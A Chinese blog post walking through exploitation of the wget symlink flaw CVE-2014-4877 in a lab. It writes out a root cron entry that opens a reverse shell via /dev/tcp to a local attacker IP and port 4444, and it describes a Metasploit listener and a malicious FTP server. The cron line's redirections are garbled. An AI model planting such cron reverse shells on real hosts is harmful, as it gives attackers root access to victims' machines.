linux反弹shell 漏洞,利用wget漏洞(CVE-2014-4877)反弹shell

28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。

攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。

首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。

cat>cronshell <

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '/dev/tcp/ 192.168.220.128/4444;sh &112 2>&112'

EOD

然后,我们利用msf监听本地端口。

78ce4928e66c4d16ee9a2e85be2bb2ea.png

搭建一个攻击ftp

61fcc4ec9be6f2ce0420154954b9f754.png

下面我用一台centos递归下载ftp上的内容。

012ed4c15d0e52ce32c28c08d7168b2f.png

可以看到,我们已经获得了session。

ab8108053ea4b4ec75e0a25ee128cfb8.png

小编感觉通过添加计划任务获得shell的方法真的很强(wei)大(suo),你有没有更好的利用方法呢?欢迎发邮件给我们。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值